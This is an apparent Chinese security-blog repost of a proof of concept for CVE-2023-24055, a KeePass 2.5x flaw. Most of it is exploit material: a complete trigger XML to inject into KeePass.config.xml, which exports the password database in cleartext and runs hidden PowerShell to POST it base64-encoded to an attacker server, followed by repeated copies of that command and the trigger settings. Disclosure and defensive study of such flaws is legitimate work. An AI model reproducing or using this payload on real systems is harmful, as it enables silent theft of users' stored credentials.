CTF导航 CTF导航

CVE-2023-24055 PoC(KeePass 2.5x)

渗透技巧 1年前 (2023) admin
545 0 0

(1) 对 KeePass 配置文件具有写入权限的攻击者KeePass.config.xml可以注入以下触发器,例如:

<?xml version="1.0" encoding="utf-8"?><TriggerCollection xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">  <Triggers>    <Trigger>      <Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>      <Name>exploit</Name>      <Events>        <Event>          <TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>          <Parameters>            <Parameter>0</Parameter>            <Parameter />          </Parameters>        </Event>      </Events>      <Conditions />      <Actions>        <Action>          <TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>          <Parameters>            <Parameter>c:UsersJohnAppDataLocalTempexploit.xml</Parameter>            <Parameter>KeePass XML (2.x)</Parameter>            <Parameter />            <Parameter />          </Parameters>        </Action>        <Action>          <TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>          <Parameters>            <Parameter>PowerShell.exe</Parameter>            <Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:UsersJohnAppDataLocalTempexploit.xml'))) </Parameter>            <Parameter>False</Parameter>            <Parameter>1</Parameter>            <Parameter />          </Parameters>        </Action>      </Actions>    </Trigger>  </Triggers></TriggerCollection>


(2) 受害者将打开 keePass 作为正常活动,保存更改等……,触发器将在后台执行,将凭据泄露给攻击者服务器

触发 PoC 详细信息

KeePass XML (2.x) formata) 触发器会将包含所有凭据的 keepass 数据库导出到以下(cleartext) 路径中,例如:

c:UsersJohnAppDataLocalTempexploit.xml

b) 导出文件后,可以定义第二个操作来使用Powershell.exe和编码为exfiltrate XML 数据,base64例如:

PowerShell.exe -ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:UsersJohnAppDataLocalTempexploit.xml')))

c) 数据将泄露到攻击者的 Web 服务器,例如:

CVE-2023-24055 PoC(KeePass 2.5x)

触发 PoC 值


Name: TriggerEvents: Saved database file | [Equals]Conditions: <empty>Actions: 
(1) Export active database File/URL: c:UsersJohnAppDataLocalTempexploit.xmlFile/Fortmat:  KeePass XML (2.x)
(2) Execute command line / URLFile/URL: PowerShell.exeArguments: -ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:UsersJohnAppDataLocalTempexploit.xml')))Window style: Hidden

证书…

PS C:UsersJohnAppDataLocalTemp> type .exploit.xml  | Select-String -Pattern Password

CVE-2023-24055 PoC(KeePass 2.5x)

CVE-2023-24055 PoC(KeePass 2.5x)

https://github.com/alt3kx/CVE-2023-24055_PoC



原文始发于微信公众号(Khan安全攻防实验室):CVE-2023-24055 PoC(KeePass 2.5x)

版权声明:admin 发表于 2023年1月30日 上午8:00。
转载请注明:CVE-2023-24055 PoC(KeePass 2.5x) | CTF导航

相关文章

原创Paper | 从入门 .NET 到分析金蝶反序列化漏洞学习笔记
admin
348
浅谈net-ntlm的利用
admin
513
原创Paper | 进宫 SAML 2.0 安全
admin
413
linikatz is a tool to attack AD on UNIX
admin
168
I’m Building a Self-Destructing USB Drive
admin
337
攻击技术研判 | 上游供应商沦陷典例-3CX供应链攻击事件
admin
381

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

凭据获取之浏览器
0
实战环境中的Redis 延时注入
0
每日安全动态推送(4-18)
0
漏洞挖掘 | DreamerCMS RCE (CVE-2024-3311)
0
Weblogic RCE(CVE-2024-21006)
0
OpenClinic GA 5.247.01 – Path Traversal (Authenticated)
0
Jenkins 2.441 – Local File Inclusion
0
Catcher(捕手)
0
CVE-2024-2448: Authenticated Command Injection In Progress Kemp LoadMaster
0
PoC Exploit Released for 0-day Windows Kernel Elevation of Privilege Vulnerability (CVE-2024-21338)
0